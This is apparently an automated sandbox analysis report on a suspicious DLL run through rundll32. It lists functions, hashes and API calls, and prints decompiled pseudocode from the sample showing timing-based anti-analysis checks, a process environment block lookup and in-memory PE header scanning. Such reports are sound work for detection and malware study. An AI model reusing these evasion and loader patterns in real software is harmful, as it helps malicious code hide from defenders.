Opcode ID: 1ecb60de2ba9acb32c5ab41e94a3872238573d209de1149e0a8b7682f90b970d
Instruction ID: aa7f467e2afd8bc3b793a2c6509724b806e4ade04ed24b09413298b4b2f0e89c
Opcode Fuzzy Hash: 1ecb60de2ba9acb32c5ab41e94a3872238573d209de1149e0a8b7682f90b970d
Instruction Fuzzy Hash: 1631F232A0221AAFDF258FB5DC64DEE3BA9EF40714F15412AEC14DB240E735D959CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E4B8ECE
SysAllocString.OLEAUT32(?), ref: 6E4B8F39
_com_issue_error.COMSUPP ref: 6E4B8F75
_com_issue_error.COMSUPP ref: 6E4B8F7F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 250c519bff54429de9af6fadf4074314b8cd91b785af0a3e60896784c7f809be
Instruction ID: 4b4c64dd60303fcc59e6580ddbd817bd369d3d6e488dcebc5287f0fef860e81a
Opcode Fuzzy Hash: 250c519bff54429de9af6fadf4074314b8cd91b785af0a3e60896784c7f809be
Instruction Fuzzy Hash: 49319CB1A00717DBE7609FB9C840F46B7E8EF09B64F21462BE824E7380D774E44187A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E4B8DC0
_com_issue_error.COMSUPP ref: 6E4B8DFC
_com_issue_error.COMSUPP ref: 6E4B8E06
SysFreeString.OLEAUT32(-00000001), ref: 6E4B8E34

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 51765fe99c29d0ab798b176e91ad90096da1859cad9661810f717782ae7967bd
Instruction ID: 9d5bfa9341ab4b321b46121c660ccaffa33000ccf36370db3daa979e6a4d537c
Opcode Fuzzy Hash: 51765fe99c29d0ab798b176e91ad90096da1859cad9661810f717782ae7967bd
Instruction Fuzzy Hash: 0F31AFB19007169BD7209FA9D804F86FBE8EB45B24F10462FE864E7380EBB5A44087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C32C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E4FFAA4), ref: 6E4C32CC
GetCurrentThreadId.KERNEL32 ref: 6E4C32DC
LeaveCriticalSection.KERNEL32(6E4FFAA4), ref: 6E4C330C
SetWindowLongW.USER32 ref: 6E4C335F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 65bd32962797d7545d8200617223cc42329f633402f38db631bf3475f740c367
Instruction ID: 9d5ded7287df7c85d3f006454ccc4729d93c28e23ce3bc24ac736ee5a5391526
Opcode Fuzzy Hash: 65bd32962797d7545d8200617223cc42329f633402f38db631bf3475f740c367
Instruction Fuzzy Hash: E221F63AA04616AF8B109FF6E848E1B7B69FF85F60304445BE815C7710DF30E812CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B90C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E4B90C7
VariantCopy.OLEAUT32(?,?), ref: 6E4B90D1
_com_issue_error.COMSUPP ref: 6E4B90E3
VariantClear.OLEAUT32 ref: 6E4B90F1

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 76e29fa2a9c41e3e8f01e622f935507d6946716ada09280879ea4f929ba3d3cf
Instruction ID: 4268b081192ebff035574772ad8c317b66c1d2b3c9e3aff9cb01548350f44d3c
Opcode Fuzzy Hash: 76e29fa2a9c41e3e8f01e622f935507d6946716ada09280879ea4f929ba3d3cf
Instruction Fuzzy Hash: 29D05E72A00A2A6B9E213BF5AC0CCCBBA1CEF067A53004426F700C2101CB76E900C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D74CC: _free.LIBCMT ref: 6E4D74EC

_free.LIBCMT ref: 6E4D7482

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4D7495
_free.LIBCMT ref: 6E4D74A6
_free.LIBCMT ref: 6E4D74B7

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 02e5ba7069621c76e9bdada1a348e8d3ae3e552dc1a8880ea1af83909311cf4e
Instruction ID: 7e16f112ece47866df0b3a3860c312dcfbbe4f3d15a8c2e7e6839d7151d0071b
Opcode Fuzzy Hash: 02e5ba7069621c76e9bdada1a348e8d3ae3e552dc1a8880ea1af83909311cf4e
Instruction Fuzzy Hash: 56F01C70C10E517B9B026FA69B28CDA3B6CEB1661D342050FF50896211DFB2061D8BC2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E4E5866,?,00000050,?,?,?,?,?), ref: 6E4E56E6

Strings

OCP, xrefs: 6E4E565F
ACP, xrefs: 6E4E5629

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 42ce4bfbb0041d23414c2a07577936daa940e1cc6d2390867dc6a9418d9bdf6a
Instruction ID: 9b0e5dd75600e3a82c39487b39794cb479e01530a10b712413b2da3187fbe9ae
Opcode Fuzzy Hash: 42ce4bfbb0041d23414c2a07577936daa940e1cc6d2390867dc6a9418d9bdf6a
Instruction Fuzzy Hash: F5213862A54101AAE3948BF5C900F8B736A9BC4B22F124817E90DC7B04FB36DE01C390

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE3A1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,6E4DC243,?,?,00000004), ref: 6E4DE3EC

Strings

;\Ln, xrefs: 6E4DE3DC
InitializeCriticalSectionEx, xrefs: 6E4DE3B2, 6E4DE3BC

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: ;\Ln$InitializeCriticalSectionEx
API String ID: 2593887523-1782081328
Opcode ID: bd5c16858d43ab1894c5f39d23086023a33d1c473188d6b5e3858b1e97072fbc
Instruction ID: c4de07480f2689054e5f219445a76f0def3a20992a6df9b06f508b0eb93ff123
Opcode Fuzzy Hash: bd5c16858d43ab1894c5f39d23086023a33d1c473188d6b5e3858b1e97072fbc
Instruction Fuzzy Hash: 3EF09071900658FBCF116FB1DC14DAEBFA5EF45B61B40415AFC052A311CB324A269A80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE1F3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 6E4DE232

Strings

;\Ln, xrefs: 6E4DE228
FlsFree, xrefs: 6E4DE204, 6E4DE20E

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Free
String ID: ;\Ln$FlsFree
API String ID: 3978063606-722890405
Opcode ID: 9d8bdf658ea8087f1faa5c24ef4761df272c30d78bf00d928514f48f69b88c47
Instruction ID: 360371c494def34fa93445e1170ab72a56c076f9545feef1e374704c6a8066c6
Opcode Fuzzy Hash: 9d8bdf658ea8087f1faa5c24ef4761df272c30d78bf00d928514f48f69b88c47
Instruction Fuzzy Hash: B2E0E5B2A01618EBCB116BF59C14DAEBB94DB96A15B00015EFC066F305CA214E068AC6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE19D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 6E4DE1DC

Strings

;\Ln, xrefs: 6E4DE1D2
FlsAlloc, xrefs: 6E4DE1AE, 6E4DE1B8

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: ;\Ln$FlsAlloc
API String ID: 2773662609-1475785183
Opcode ID: 933cbbb03d0b36bf6ca342a9020994d1534a83b8311275f644d47e652b007a0f
Instruction ID: 06673217369f43e479f19154e7d4dc7eb3ba5c150e625175a497d703b94439a7
Opcode Fuzzy Hash: 933cbbb03d0b36bf6ca342a9020994d1534a83b8311275f644d47e652b007a0f
Instruction Fuzzy Hash: 48E05570E00518EB87127BF19C20D6EFB98CF86B11B00015BFC062B302DE326E1A85D6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CC302, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 6E4CC317

Strings

;\Ln, xrefs: 6E4CC32A
FlsAlloc, xrefs: 6E4CC310

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: ;\Ln$FlsAlloc
API String ID: 2742660187-1475785183
Opcode ID: 077c0ba5ff123f507eab15f386e72b59b62f78ec726e760e85bbdd741b89bf26
Instruction ID: 6f13e9bba1883b1ce80a900bcb4a141b279279f721aff85c1502e9c510883308
Opcode Fuzzy Hash: 077c0ba5ff123f507eab15f386e72b59b62f78ec726e760e85bbdd741b89bf26
Instruction Fuzzy Hash: F9D01231D45675A3C56136F57C04EA9BF449B019A3F044173E9186E7169552581186D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,0166B020), ref: 6E4DEB49
GetLastError.KERNEL32 ref: 6E4DEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E4DEBB2

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 49db07cb478fd7ea581657a49201a7ef97dc3ac21bafe203e30da83fb0341e36
Instruction ID: ed646e64a1fab275718bb034c0ed2126f3dede963be5117570b858870d9b8b97
Opcode Fuzzy Hash: 49db07cb478fd7ea581657a49201a7ef97dc3ac21bafe203e30da83fb0341e36
Instruction Fuzzy Hash: 98412930E04606AFCB21CFF9C8E4FAABBB4EF01714F11055BE96597295D731A949CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6508 Parent PID: 6480 rundll32.exeCOMMON

Executed Functions

Function 6E4B6620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E6E4B6620(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v28;
				signed char _v36;
				intOrPtr* _v40;
				void* _v44;
				signed char _v48;
				signed int _v52;
				signed int _v60;
				char _v61;
				signed int _v68;
				signed int* _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed char _v92;
				intOrPtr* _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				signed int _v113;
				short _v120;
				signed int _v128;
				signed char _v136;
				signed int _v144;
				signed short* _v152;
				intOrPtr _v156;
				signed char _v160;
				intOrPtr* _v188;
				signed int _v200;
				signed int _v236;
				signed char _v240;
				intOrPtr _v244;
				signed char _v268;
				signed int _v284;
				intOrPtr _v288;
				intOrPtr _v296;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr _v332;
				intOrPtr _v412;
				char _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v440;
				char _v444;
				intOrPtr* _v448;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t427;
				signed int _t428;
				intOrPtr* _t430;
				signed char _t434;
				signed int _t441;
				signed int _t453;
				intOrPtr* _t455;
				signed char _t456;
				intOrPtr _t461;
				signed int _t462;
				short _t464;
				void* _t465;
				intOrPtr* _t468;
				signed int _t471;
				void* _t479;
				signed char _t480;
				signed char _t481;
				signed char _t483;
				signed int _t486;
				signed int _t498;
				void* _t501;
				int _t503;
				void* _t504;
				void* _t505;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t517;
				signed char _t520;
				signed char _t521;
				void* _t524;
				void* _t528;
				signed int* _t531;
				void* _t533;
				signed char _t543;
				void* _t544;
				signed int _t545;
				char _t555;
				signed char _t557;
				void* _t559;
				void* _t560;
				void* _t562;
				void* _t563;
				void* _t565;
				void* _t568;
				void* _t569;
				intOrPtr _t580;
				void* _t582;
				signed char _t583;
				signed int _t585;
				signed int _t589;
				signed char _t592;
				signed char _t595;
				signed char _t596;
				signed char _t601;
				void* _t608;
				void* _t609;
				signed int _t615;
				signed int _t617;
				signed char _t618;
				signed char _t623;
				signed char _t626;
				void* _t628;
				signed char _t631;
				long _t632;
				signed char _t640;
				signed char _t652;
				void* _t654;
				void* _t655;
				void* _t656;
				signed int _t658;
				signed int _t659;
				void* _t661;
				void* _t665;
				void* _t668;
				signed char _t670;
				signed char _t671;
				void* _t674;
				intOrPtr _t678;
				signed char _t679;
				signed char _t680;
				signed int _t684;
				signed int _t685;
				void* _t691;
				void* _t695;
				signed int* _t697;
				signed int _t707;
				signed int _t709;
				signed int _t713;
				signed int _t714;
				signed int _t718;
				signed int _t719;
				signed int _t729;
				signed int _t739;
				char* _t748;
				signed char _t749;
				signed char _t750;
				long _t772;
				signed short* _t774;
				intOrPtr* _t775;
				signed int _t776;
				intOrPtr _t797;
				intOrPtr _t798;
				signed int _t802;
				signed char _t808;
				void* _t814;
				signed int _t815;
				signed int _t819;
				void* _t821;
				signed int _t822;
				signed int _t823;
				signed int _t827;
				intOrPtr* _t829;
				void* _t838;
				signed int _t841;
				intOrPtr* _t842;
				signed int _t843;
				intOrPtr* _t844;
				signed int _t845;
				void* _t848;
				intOrPtr* _t850;
				signed int _t851;
				unsigned int _t853;
				signed char _t854;
				intOrPtr _t856;
				signed int _t857;
				signed int _t858;
				intOrPtr* _t859;
				signed char _t860;
				signed int _t864;
				signed short _t865;
				signed int _t866;
				void* _t868;
				signed short* _t870;
				void* _t871;
				signed char _t872;
				void* _t873;
				intOrPtr* _t874;
				signed int _t877;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				intOrPtr* _t882;
				signed int _t884;
				void* _t886;
				intOrPtr* _t887;
				void* _t888;
				signed int _t889;
				intOrPtr* _t891;
				signed char _t893;
				signed short* _t894;
				unsigned short _t896;
				signed int _t898;
				signed int _t900;
				signed int _t902;
				signed int* _t904;
				signed int _t905;
				signed char _t906;
				signed int _t907;
				intOrPtr* _t909;
				signed int _t912;
				void* _t913;
				intOrPtr _t914;

				_t674 = __ecx;
				_push(0xffffffff);
				_push(E6E4E93D0);
				_push( *[fs:0x0]);
				_t914 = _t913 - 0x1b0;
				_t420 =  *0x6e4ff008; // 0x2b098c7c
				_t421 = _t420 ^ _t912;
				_v24 = _t421;
				_push(__esi);
				_push(_t421);
				_t422 =  &_v16;
				 *[fs:0x0] = _t422;
				_v20 = _t914;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x1bc], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x1ac], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0x19c], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t422 > 0x989680) {
					_t841 = 0xc2869da;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t841 = _t422;
				}
				asm("rdtscp");
				_v28 = _t674;
				_t427 = E6E4E8A60(_t422 * 0x85d6, 0 + (_t422 * 0x85d6 >> 0x20), 0x5f, 0);
				asm("movd xmm0, edi");
				_t428 = _t427 + 3;
				asm("cvtdq2ps xmm0, xmm0");
				_t877 = _t428;
				_v112 = _t428;
				_v60 = _t877;
				_v288 = _t877;
				_v156 = _t877;
				asm("movss [ebp-0x1c], xmm0");
				asm("movss [ebp-0x24], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0xd4], xmm0");
				asm("movsd [ebp-0x170], xmm0");
				asm("movsd xmm0, [0x6e4f9698]");
				asm("movsd [ebp-0xdc], xmm0");
				asm("movsd xmm0, [0x6e4f9558]");
				asm("movsd [ebp-0xac], xmm0");
				asm("movsd [ebp-0xe4], xmm0");
				asm("movsd xmm0, [0x6e4f96c8]");
				_v236 = 0;
				_v316 = 0;
				_v200 = 0;
				_v320 = 0;
				_v128 = 0;
				_v284 = 0;
				_v68 = 0;
				asm("movsd [ebp-0x178], xmm0");
				asm("movsd [ebp-0x90], xmm0");
				__imp__GetTickCount64();
				__imp__GetTickCount64();
				_t430 = _v448;
				_v188 = _t430;
				_v332 = _t430;
				_t432 =  !=  ? _t841 : _t877;
				_v8 = 0;
				_t842 = _v448;
				_v44 =  !=  ? _t841 : _t877;
				while(1) {
					__imp__GetTickCount64();
					__imp__GetTickCount64();
					if( *_t842 != 0x5a4d) {
						goto L256;
					}
					_t678 =  *((intOrPtr*)(_t842 + 0x3c));
					_t434 = _t678 - 0x40;
					if(_t434 > 0x3bf) {
						goto L256;
					}
					_t679 = _t678 + _t842;
					_v36 = _t679;
					_v268 = _t679;
					if( *_t679 != 0x4550) {
						goto L256;
					}
					_t814 = _v44;
					_v8 = 0xffffffff;
					_t680 =  *[fs:0x30];
					asm("movss xmm0, [0x6e4f9774]");
					_v48 = _t680;
					_v240 = _t680;
					asm("movss [ebp-0xf8], xmm0");
					if(_t814 == _t877) {
						asm("movss xmm1, [0x6e4f96dc]");
						asm("movsd xmm2, [0x6e4f9610]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						asm("ucomiss xmm0, xmm1");
						asm("movsd [ebp-0x34], xmm2");
						asm("movss [ebp-0xa0], xmm1");
						asm("lahf");
						__eflags = _t434 & 0x00000044;
						if((_t434 & 0x00000044) != 0) {
							L13:
							_v61 = 0x3f;
							_v28 = 0xb;
							_v88 = 0x15;
							goto L14;
							L18:
							asm("movss xmm0, [0x6e4f974c]");
							asm("comiss xmm1, xmm0");
							asm("movss [ebp-0x24], xmm1");
							asm("movss [ebp-0x1c], xmm1");
							asm("movss [ebp-0x48], xmm0");
							if(__eflags <= 0) {
								L21:
								_t843 = _v68;
								_t814 = _v44;
								goto L22;
							} else {
								_t874 = __imp__CoFreeUnusedLibraries;
								do {
									 *_t874();
									asm("cdq");
									_push(_t814);
									_push(0x6b);
									E6E4B5A30();
									asm("cvttsd2si esi, xmm0");
									_t914 = _t914 + 8;
									asm("movd xmm0, esi");
									asm("cvtdq2ps xmm0, xmm0");
									asm("comiss xmm0, [ebp-0x48]");
									asm("movss [ebp-0x1c], xmm0");
									asm("movss [ebp-0x24], xmm0");
								} while (__eflags > 0);
								goto L21;
							}
							L14:
							__imp__GetShellWindow();
							_v61 = E6E4B5EE0(_v61, _t814);
							asm("cdq");
							_push(_t814);
							_push(_v28);
							E6E4B5A30();
							_t914 = _t914 + 8;
							asm("cvttsd2si edx, xmm0");
							_t684 = _v88 * _t814;
							_v28 = _t814;
							_v88 = _t684;
							_v113 = _t814 - _t684;
							_t685 = _t684;
							_t441 = _t814;
							asm("cdq");
							_t814 = _t441 % _t685;
							_t443 = _t441 / _t685 * _v113;
							asm("movd xmm0, ecx");
							asm("cvtdq2ps xmm0, xmm0");
							asm("ucomiss xmm0, [ebp-0xa0]");
							asm("lahf");
							__eflags = _t441 / _t685 * _v113 & 0x00000044;
							if(__eflags != 0) {
								goto L14;
							} else {
								asm("comiss xmm0, [0x6e4f9730]");
								if(__eflags <= 0) {
									GetOEMCP();
									E6E4E8E30(E6E4B5D90(), _t445);
									asm("movss xmm2, [0x6e4f9560]");
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									asm("movss [ebp-0xa4], xmm2");
									asm("addss xmm1, xmm2");
								} else {
									asm("movss xmm0, [0x6e4f96f0]");
									_t668 = E6E4E8AFE(_t443);
									_push(_t814);
									_push(_t668);
									E6E4B5A30();
									asm("movss xmm1, [0x6e4f97b0]");
									_t914 = _t914 + 8;
									asm("cvtsd2ss xmm0, xmm0");
									asm("subss xmm1, xmm0");
									asm("movss xmm0, [0x6e4f9560]");
									asm("movss [ebp-0xa4], xmm0");
								}
								goto L18;
							}
						} else {
							asm("movsd xmm3, [0x6e4f95a0]");
							asm("movsd [ebp-0xc0], xmm3");
							do {
								asm("cvttsd2si ecx, xmm2");
								E6E4B5D90();
								asm("movsd xmm1, [ebp-0x34]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm1, xmm0");
								asm("movss xmm0, [ebp-0x18]");
								asm("movsd [ebp-0x34], xmm1");
								_t670 = E6E4B5C20(_t680, _t814);
								asm("movsd xmm2, [ebp-0x34]");
								asm("movaps xmm4, xmm0");
								asm("movd xmm1, esi");
								asm("cvtdq2pd xmm1, xmm1");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("divsd xmm1, xmm2");
								asm("addsd xmm0, xmm2");
								asm("movss [ebp-0x18], xmm4");
								asm("cvttsd2si eax, xmm0");
								asm("xorps xmm0, xmm0");
								_t671 = _t670;
								asm("cvtss2sd xmm0, xmm4");
								asm("movd xmm3, eax");
								asm("cvtdq2pd xmm3, xmm3");
								asm("subsd xmm1, xmm0");
								asm("movsd [ebp-0xc0], xmm3");
								asm("addsd xmm1, xmm3");
								asm("cvtpd2ps xmm0, xmm1");
								asm("ucomiss xmm0, [ebp-0xa0]");
								asm("lahf");
								__eflags = _t671 & 0x00000044;
							} while ((_t671 & 0x00000044) != 0);
							goto L13;
						}
					} else {
						_t808 =  *(_t680 + 0xc);
						asm("movss xmm0, [0x6e4f96dc]");
						asm("movss xmm2, [0x6e4f9560]");
						_v48 = _t808;
						_t843 =  *((intOrPtr*)(_t808 + 0x14));
						_v240 = _t808;
						_v68 = _t843;
						asm("movss [ebp-0xa0], xmm0");
						asm("movss [ebp-0xa4], xmm2");
						L22:
						asm("xorps xmm0, xmm0");
						asm("movss [ebp-0x110], xmm0");
						asm("movss xmm0, [0x6e4f9760]");
						asm("movss [ebp-0x80], xmm0");
						asm("movsd xmm0, [0x6e4f95f8]");
						asm("movsd [ebp-0x150], xmm0");
						asm("movss xmm0, [0x6e4f97ac]");
						asm("movss [ebp-0xf4], xmm0");
						asm("movss xmm0, [0x6e4f9708]");
						asm("movss [ebp-0xcc], xmm0");
						asm("movss xmm0, [0x6e4f9728]");
						asm("movss [ebp-0x5c], xmm0");
						asm("movss xmm0, [0x6e4f9768]");
						asm("movss [ebp-0xc8], xmm0");
						asm("movss xmm0, [0x6e4f95c8]");
						asm("movss [ebp-0x120], xmm0");
						asm("movss xmm0, [0x6e4f9750]");
						asm("movss [ebp-0x104], xmm0");
						asm("movss xmm0, [0x6e4f96f8]");
						asm("movss [ebp-0x128], xmm0");
						asm("movss xmm0, [0x6e4f9794]");
						asm("movss [ebp-0x12c], xmm0");
						asm("movsd xmm0, [0x6e4f9588]");
						asm("movsd [ebp-0x180], xmm0");
						asm("movss xmm0, [0x6e4f96b8]");
						asm("movss [ebp-0x130], xmm0");
						asm("movss xmm0, [0x6e4f9720]");
						asm("movss [ebp-0x78], xmm0");
						asm("movsd xmm0, [0x6e4f95d8]");
						asm("movsd [ebp-0xc0], xmm0");
						asm("movss xmm0, [0x6e4f96e4]");
						asm("movss [ebp-0x100], xmm0");
						asm("movsd xmm0, [0x6e4f95a8]");
						asm("movsd [ebp-0x188], xmm0");
						asm("movss xmm0, [0x6e4f96ac]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [0x6e4f9748]");
						asm("movss [ebp-0x140], xmm0");
						asm("movsd xmm0, [0x6e4f9600]");
						asm("movsd [ebp-0x168], xmm0");
						asm("movss xmm0, [0x6e4f978c]");
						asm("movss [ebp-0x144], xmm0");
						asm("movsd xmm0, [0x6e4f9580]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [0x6e4f9714]");
						asm("movss [ebp-0xfc], xmm0");
						asm("movss xmm0, [0x6e4f975c]");
						asm("movss [ebp-0x154], xmm0");
						asm("movss xmm0, [0x6e4f96b4]");
						asm("movss [ebp-0x54], xmm0");
